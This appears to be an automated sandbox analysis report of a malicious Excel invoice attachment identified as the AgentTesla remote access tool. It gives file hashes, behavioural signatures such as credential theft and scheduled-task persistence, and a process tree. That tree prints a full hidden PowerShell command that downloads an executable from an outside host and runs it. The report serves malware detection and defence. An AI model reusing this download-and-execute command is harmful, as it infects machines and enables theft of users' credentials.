Analysis
-
max time kernel
114s -
max time network
120s -
platform
windows7_x64 -
resource
win7 -
submitted
13-07-2020 14:17
Static task
static1
Behavioral task
behavioral1
Sample
INV+PL+BL-489492020.xls
Resource
win7
Behavioral task
behavioral2
Sample
INV+PL+BL-489492020.xls
Resource
win10
General
-
Target
INV+PL+BL-489492020.xls
-
Size
192KB
-
MD5
b379714e8daaf2673032f31b2a6abb07
-
SHA1
b4f97dceff91b030a76dd19e45b91826fd382e86
-
SHA256
4eaaf544257b0465bb8acff69b987abf00bd19a32fbc45bc0e57b8c66244553a
-
SHA512
11e3989a2641872fb9a08f9d6d6af330eab9cc4c28a84b6801cfe91c56bc5c7fc224265e2afc6661a96cd8b71bd7298e53ae6b3440b4048600c15d131e6db6a4
Malware Config
Extracted
http://crogtrt.com/i7/15601277.jpg
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 452 608 cmd.exe EXCEL.EXE -
Loads dropped DLL 1 IoCs
Processes:
dfge.exepid process 1312 dfge.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Office loads VBA resources, possible macro or embedded object present
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 608 EXCEL.EXE -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
EXCEL.EXEcmd.exepowershell.exedfge.exedescription pid process target process PID 608 wrote to memory of 452 608 EXCEL.EXE cmd.exe PID 608 wrote to memory of 452 608 EXCEL.EXE cmd.exe PID 608 wrote to memory of 452 608 EXCEL.EXE cmd.exe PID 452 wrote to memory of 296 452 cmd.exe powershell.exe PID 452 wrote to memory of 296 452 cmd.exe powershell.exe PID 452 wrote to memory of 296 452 cmd.exe powershell.exe PID 296 wrote to memory of 1312 296 powershell.exe dfge.exe PID 296 wrote to memory of 1312 296 powershell.exe dfge.exe PID 296 wrote to memory of 1312 296 powershell.exe dfge.exe PID 296 wrote to memory of 1312 296 powershell.exe dfge.exe PID 1312 wrote to memory of 1832 1312 dfge.exe schtasks.exe PID 1312 wrote to memory of 1832 1312 dfge.exe schtasks.exe PID 1312 wrote to memory of 1832 1312 dfge.exe schtasks.exe PID 1312 wrote to memory of 1832 1312 dfge.exe schtasks.exe PID 1312 wrote to memory of 1888 1312 dfge.exe dfge.exe PID 1312 wrote to memory of 1888 1312 dfge.exe dfge.exe PID 1312 wrote to memory of 1888 1312 dfge.exe dfge.exe PID 1312 wrote to memory of 1888 1312 dfge.exe dfge.exe PID 1312 wrote to memory of 1888 1312 dfge.exe dfge.exe PID 1312 wrote to memory of 1888 1312 dfge.exe dfge.exe PID 1312 wrote to memory of 1888 1312 dfge.exe dfge.exe PID 1312 wrote to memory of 1888 1312 dfge.exe dfge.exe PID 1312 wrote to memory of 1888 1312 dfge.exe dfge.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exedfge.exedfge.exedescription pid process Token: SeDebugPrivilege 296 powershell.exe Token: SeDebugPrivilege 1312 dfge.exe Token: SeDebugPrivilege 1888 dfge.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
dfge.exedescription pid process target process PID 1312 set thread context of 1888 1312 dfge.exe dfge.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
EXCEL.EXEdfge.exepid process 608 EXCEL.EXE 608 EXCEL.EXE 608 EXCEL.EXE 1888 dfge.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exedfge.exedfge.exepid process 296 powershell.exe 296 powershell.exe 1312 dfge.exe 1888 dfge.exe 1888 dfge.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 296 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
dfge.exedfge.exepid process 1312 dfge.exe 1888 dfge.exe
Processes
-
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\INV+PL+BL-489492020.xls1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:608 -
C:\Windows\system32\cmd.execmd /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://crogtrt.com/i7/15601277.jpg',$env:Temp+'\dfge.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\dfge.exe')2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://crogtrt.com/i7/15601277.jpg',$env:Temp+'\dfge.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\dfge.exe')3⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:296 -
C:\Users\Admin\AppData\Local\Temp\dfge.exe"C:\Users\Admin\AppData\Local\Temp\dfge.exe"4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
PID:1312 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LnqbjYKeoN" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA949.tmp"5⤵
- Creates scheduled task(s)
PID:1832 -
C:\Users\Admin\AppData\Local\Temp\dfge.exe"{path}"5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
PID:1888